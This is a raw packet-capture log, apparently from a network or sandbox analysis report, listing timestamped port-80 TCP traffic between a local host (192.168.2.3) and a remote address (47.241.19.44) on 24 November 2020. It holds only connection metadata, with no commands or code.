                                                                                                                                      Nov 24, 2020 21:20:03.582791090 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582807064 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582832098 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582868099 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582875013 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582907915 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582921982 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582958937 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.583004951 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.622404099 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622456074 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622497082 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622608900 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.622638941 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.622643948 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622684002 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622724056 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622747898 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.622765064 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622795105 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.622805119 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622869968 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.702338934 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.702709913 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.799209118 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799268007 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799299002 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799328089 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799371004 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799411058 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799448013 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799485922 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799526930 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799576044 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799578905 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.799623013 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799655914 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.799729109 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.838664055 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838721991 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838752985 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838781118 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838820934 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036159992 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036197901 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036236048 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036273003 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036309958 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036348104 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036385059 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036432028 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036473989 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036510944 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036549091 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036587954 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036623001 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036655903 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036966085 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.117624044 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117679119 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117708921 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117738008 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117768049 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117806911 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117846012 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117885113 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117889881 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.117923975 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117940903 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.117948055 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.117964983 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117966890 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.118000984 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.118009090 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.118024111 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.118084908 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157073021 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157126904 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157164097 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157202959 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157241106 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157279015 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157291889 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157316923 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157339096 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157345057 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157350063 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157357931 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.157370090 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157423973 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.297756910 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.297924042 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319242954 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319287062 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319323063 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319369078 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319400072 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319412947 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319443941 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319451094 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319453001 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319457054 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319462061 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319492102 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319530010 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319530964 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319550991 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319567919 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319602966 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319606066 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319618940 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319644928 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.319667101 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.319705009 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.358778000 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.358833075 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.358871937 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.358908892 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.358948946 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.358961105 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.358987093 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.359009027 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359015942 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359019995 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359024048 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359028101 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359036922 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.359081030 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.359097958 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359119892 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.359137058 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.359175920 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.378710032 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.378813028 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520325899 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520381927 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520422935 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520463943 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520503044 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520509005 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520550966 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520556927 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520562887 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520596027 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520612955 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520636082 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520642042 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520677090 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520692110 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520716906 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520734072 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520756006 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.520771980 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520806074 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.520843983 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.558634043 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.558748960 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580138922 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580179930 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580219984 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580259085 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580287933 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580296993 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580337048 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580337048 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580343962 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580348969 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580353022 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580375910 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580389977 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580424070 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580446005 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580466986 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580471992 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580503941 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.580522060 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.580557108 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.721613884 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721677065 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721723080 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721760988 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.721795082 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.721801996 CET804975347.241.19.44192.168.2.3
Nov 24, 2020 21:20:08.721836090 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.721843004 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.721843958 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.721848965 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.721853018 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.721880913 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.721895933 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.721920013 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.721930027 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.721959114 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.721973896 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.722007036 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.722027063 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.722069979 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761034966 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761091948 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761132956 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761169910 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761200905 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761208057 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761245966 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761251926 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761255026 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761256933 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761261940 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761297941 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761316061 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761337042 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761352062 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761378050 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761398077 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761436939 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761450052 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761487961 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761502981 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761537075 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.761543989 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.761584997 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.781353951 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.781452894 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.922971010 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.923026085 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.923057079 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.923086882 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.923129082 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.923167944 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.923204899 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.923254967 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.923296928 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.923315048 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.923337936 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.923363924 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.923369884 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.923374891 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.923393965 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.962708950 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.962766886 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.962807894 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.962850094 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.962889910 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.962919950 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.962940931 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.962963104 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.962969065 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.962973118 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.962977886 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.962985992 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.963001013 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.963027954 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.963057995 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.963074923 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.963094950 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.963114977 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.963129997 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.963154078 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.963170052 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.963207960 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:08.982688904 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:08.982858896 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.003694057 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.003748894 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.003837109 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.003897905 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.022083998 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.022320032 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.124238014 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.124291897 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.124329090 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.124371052 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.124396086 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.124412060 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.124442101 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.124447107 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.124452114 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.124461889 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.124506950 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.124509096 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.124516010 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.124545097 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.124560118 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.124599934 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.124733925 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.124775887 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.124794006 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.124835014 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.163991928 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.164047003 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.164089918 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.164130926 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.164169073 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.164197922 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.164218903 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.164239883 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.164246082 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.164252043 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.164257050 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.164266109 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.164273977 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.164304972 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.164320946 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.164345026 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.164360046 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.164385080 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.164401054 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.164424896 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.164441109 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.164474964 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.183928967 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.184156895 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.205282927 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.205338955 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.205379963 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.205492020 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.205560923 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.205574989 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.223812103 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.223979950 CET  49753  80  192.168.2.3  47.241.19.44
Nov 24, 2020 21:20:09.326092958 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.326159954 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.326189995 CET  80  49753  47.241.19.44  192.168.2.3
Nov 24, 2020 21:20:09.326220989 CET  80  49753  47.241.19.44  192.168.2.3
